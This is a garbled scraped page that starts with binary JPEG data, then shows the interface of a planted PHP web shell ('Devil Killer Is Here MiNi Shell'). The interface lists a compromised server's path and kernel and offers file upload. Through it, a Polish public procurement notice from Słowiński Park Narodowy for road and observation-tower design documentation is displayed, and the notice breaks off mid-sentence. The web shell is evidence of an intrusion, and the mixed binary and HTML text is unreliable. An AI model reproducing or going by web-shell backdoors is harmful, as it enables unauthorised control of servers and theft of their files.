JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190530/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190530/554504-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 554504-N-2019 z dnia 2019-05-30 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Słowiński Park Narodowy</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Opracowanie dokumentacji techniczno-kosztorysowych</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Słowiński Park Narodowy</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">22157840000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Bohaterów Warszawy</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu"></span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">76-214</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Smołdzino</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">pomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">598 117 204</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">a.hylarecka@slowinskipn.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">598 117 509</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.bip.slowinskipn.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Państwowa Osoba Prawna</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.slowinskipn.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Ofertę należy złożyć za pośrednictwem operatora pocztowego, osobiście lub za pośrednictwem posłańca</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">sekretariat Słowińskiego Paku Narodowego, ul. Boh. Warszawy 1A, 76-214 Smołdzino</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Opracowanie dokumentacji techniczno-kosztorysowych</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">SPN.26.08.2019.ah-m</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Przedmiotem zamówienia jest opracowanie dokumentacji techniczno-kosztorysowych i pełnienie nadzoru autorskiego nad realizacją robót zgodnie z opisem przedmiotu zamówienia zawartym w załącznikach nr 5.1 i nr 5.2 do SIWZ:Część nr 1 dla robót drogowych:1) zadanie nr 1 - Przebudowa drogi pożarowej nr 3 w Obwodzie Ochronnym Smołdzino,2) zadanie nr 2 - Przebudowa drogi pożarowej nr 3A w Obwodzie Ochronnym Smołdzino,3) zadanie nr 3 - Przebudowa drogi pożarowej nr 4 w Obwodzie Ochronnym Smołdzino,Część nr 2 na odbudowę wież widokowych:1)	zadanie nr 1 - Odbudowa wieży widokowej w O.O. Rąbka,2)	zadanie nr 2 - Odbudowa wieży widokowej w O.O. Rowy,3)	zadanie nr 3 - Odbudowa wieży widokowej w O.O. Kluki.2. Przedmiot zamówienia obejmować będzie:1) działania poprzedzające opracowanie dokumentacji techniczno-kosztorysowej:a)	wykonanie niezbędnych pomiarów inwentaryzacyjnych oraz badań geotechnicznych,b)	opracowanie dokumentacji geotechnicznej,c)	uzyskanie, w razie potrzeby, dodatkowych danych i warunków technicznych oraz postanowień i uzgodnień od innych podmiotów i ewentualnie gestorów sieci,d)	opracowanie mapy sytuacyjno-wysokościowej do celów projektowych wraz z niezbędnymi uzgodnieniami,e)	opracowanie Karty Informacyjnej Przedsięwzięcia (w przypadku obowiązku jej sporządzenia),f)	przygotowanie i złożenie wniosków do właściwego urzędu gminy o wydanie decyzji o środowiskowych uwarunkowaniach na realizację inwestycji, decyzji o lokalizacji inwestycji celu publicznego,g)	w razie nałożenia obowiązku - sporządzenie raportu oddziaływania na środowisko,h)	wykonanie innych opracowań niezbędnych celem uzyskania decyzji o pozwoleniu na budowę,i)	wykonanie projektu koncepcyjnego przedstawiającego minimum 2 warianty rozwiązań - uzyskanie akceptacji Zamawiającego dla jednego z tych wariantów, a dla projektu koncepcyjnego wybranego przez Zamawiającego opracowanie projektu budowlanego,2)	opracowanie i uzgodnienie projektu budowlanego o charakterze projektu wykonawczego wchodzącego w skład dokumentacji techniczno-kosztorysowej oraz uzyskanie ostatecznej akceptacji Zamawiającego dla projektu budowlanego przed przystąpieniem do opracowania pozostałej części przedmiotu zamówienia. Ponadto należy uzyskać wszelkie inne uzgodnienia podmiotów zewnętrznych oraz ewentualne odstępstwa od obowiązujących warunków technicznych, celem uzyskania decyzji o pozwoleniu na budowę;3)	opracowanie przedmiarów robót i kosztorysów inwestorskich;4)	opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych;5)	opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia;6)	wykonanie niezbędnych opracowań i uzyskanie wszelkich koniecznych uzgodnień i decyzji administracyjnych umożliwiających realizację robót;7)	przygotowanie i złożenie w imieniu Zamawiającego kompletnych wniosków wraz z niezbędną dokumentacją techniczną do właściwego organu administracji architektoniczno-budowlanej, w celu uzyskania decyzji administracyjnych, umożliwiających realizację robót oraz dokonywanie wszelkich zmian i uzupełnień w dokumentacji na etapie ubiegania się o decyzję;8)	dostarczanie na bieżąco Zamawiającemu kopii wszelkiej korespondencji związanej z uzyskaniem niezbędnych opinii, decyzji i uzgodnień, w sposób opisany w umowie;9)	sporządzenie w wersji papierowej odrębnie dla poszczególnych zadań:a)	Projektu koncepcyjnego - 1 egzemplarz,b)	Projektu budowlanego o charakterze projektu wykonawczego - 5 egzemplarzy (1 egzemplarz Wykonawca przekaże Zamawiającemu wraz z dokumentacją określoną w pkt 2)-6), 4 egzemplarze wraz z wnioskiem o pozwolenie na budowę do organu administracji architektoniczno-budowlanej),c)	Kosztorysów inwestorskich - 2 egzemplarze,d)	Przedmiarów robót budowlanych - 2 egzemplarze,e)	Specyfikacji technicznych wykonania i odbioru robót budowlanych - 5 egzemplarzy,f)	Karty Informacyjnej Przedsięwzięcia - 1 egzemplarz,g)	Dokumentacji geotechnicznej - 2 egzemplarze,h)	Mapy do celów projektowych - 1 egzemplarz,10)	sporządzenie w/w dokumentacji w wersji elektronicznej na płycie CD - 2 egz.11)	pełnienie nadzoru autorskiego nad opracowaną dokumentacją techniczno-kosztorysową dla poszczególnych zadań, w ramach którego należy wykonać m.in. następujące czynności:a)	nadzór w toku realizacji robót budowlanych nad zgodnością rozwiązań technicznych, materiałowych i użytkowych z dokumentacją projektową,b)	uzupełnienia szczegółów dokumentacji projektowej oraz wyjaśnienia wątpliwości powstałych w toku realizacji robót,c)	ewentualny udział w naradach technicznych na pisemne wezwanie Zamawiającego. Przyjmuje się, że liczba pobytów projektanta (projektantów) na budowie wynikać będzie z uzasadnionych potrzeb określonych każdorazowo przez Zamawiającego (maksymalnie 3 pobyty),d)	aktualizacja kosztorysów inwestorskich wykonana na wniosek Zamawiającego w celu zgodnego z przepisami prawa zamówień publicznych przeprowadzenia postępowania (jednokrotna w ciągu 3 lat),e)	przygotowanie i dostarczenie odpowiedzi w formie elektronicznej na zapytania na etapie realizacji procedur na roboty budowlane.3. Dokumentacje techniczno - kosztorysowe na przebudowę dróg pożarowych wykonane w ramach części nr 1, muszą spełniać wymogi § 13.3 rozporządzenia MSWiA z dnia 24 lipca 2009 r. w sprawie przeciwpożarowego zaopatrzenia w wodę oraz dróg pożarowych tj. droga pożarowa powinna umożliwiać przejazd pojazdów o nacisku osi na nawierzchnię jezdni co najmniej 50 kN, a jej minimalna szerokość nie może być mniejsza niż 3 m oraz spełniać wymogi § 7 rozporządzenia MŚ z dnia 22 marca 2006r. w sprawie szczegółowych zasad zabezpieczenia przeciwpożarowego lasów. 4.	Dokumentacje techniczno- kosztorysowe wykonane w ramach części nr 1 i części nr 2 posłużą Zamawiającemu do przygotowania i przeprowadzenia postępowania na wykonanie robót z zastosowaniem ustawy Prawo zamówień publicznych, w związku z tym, winny zostać sporządzone z uwzględnieniem przepisów tej ustawy w szczególności zawartych w art.29-30 p.z.p. 5.	Dokumentacje techniczno- kosztorysowe wykonane w ramach części nr 1 i części nr 2 posłużą wykonaniu robót budowlanych na terenie parku narodowego oraz obszarach Natura 2000 na, których obowiązują przepisy ustawy o ochronie przyrody. 6. Zamawiający wymaga od Wykonawcy udzielenia na wykonaną w ramach przedmiotu zamówienia dokumentację techniczno-kosztorysową gwarancję na okres 36 miesięcy.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">71320000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71247000-1</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2021-12-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">1. Wymagany termin realizacji zamówienia:1) dla dokumentacji techniczno-kosztorysowej: od podpisania umowy do 29 listopada 2019 roku,2) dla pełnienia nadzoru autorskiego: do 31 grudnia 2021 roku. 2. Planowany termin rozpoczęcia nadzoru autorskiego: 2020 rok.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Dla potwierdzenia:1) zdolności technicznych Zamawiający będzie wymagał od Wykonawcy:dla części nr 1:a)	doświadczenia w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie w wykonaniu co najmniej jednej dokumentacji techniczno-kosztorysowej obejmującej swym zakresem budowę lub przebudowę lub remont drogi, która uzyskała decyzję administracyjną umożliwiającą realizację robót budowlanych;dla części nr 2:b)	doświadczenia w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie w wykonaniu co najmniej jednej dokumentacji techniczno-kosztorysowej obejmującej swym zakresem budowę lub przebudowę lub odbudowę lub remont wysokościowych obiektów inżynieryjnych o konstrukcji drewnianej lub stalowej lub stalowo-drewnianej o wysokości nie mniejszej niż 10m nad poziomem terenu, która uzyskała decyzję administracyjną umożliwiającą realizację robót budowlanych;2) zdolności zawodowych Zamawiający będzie wymagał od Wykonawcy:dla części nr 1:a)	dysponowania osobą z uprawnieniami do projektowania bez ograniczeń w specjalności inżynieryjnej drogowej, mającą doświadczenie w wykonaniu co najmniej jednej dokumentacji techniczno-kosztorysowej obejmującej swym zakresem budowę lub przebudowę lub remont drogi, która uzyskała decyzję administracyjną umożliwiającą realizację robót budowlanych;dla części nr 2:b)	dysponowania osobą z uprawnieniami do projektowania bez ograniczeń w specjalności konstrukcyjno-budowlanej, mająca doświadczenie w wykonaniu co najmniej jednej dokumentacji techniczno-kosztorysowej obejmującej swym zakresem budowę lub przebudowę lub odbudowę lub remont wysokościowych obiektów inżynieryjnych o konstrukcji drewnianej lub stalowej lub stalowo-drewnianej o wysokości nie mniejszej niż 10m nad poziomem terenu, która uzyskała decyzję administracyjną umożliwiającą realizację robót budowlanych;Zamawiający 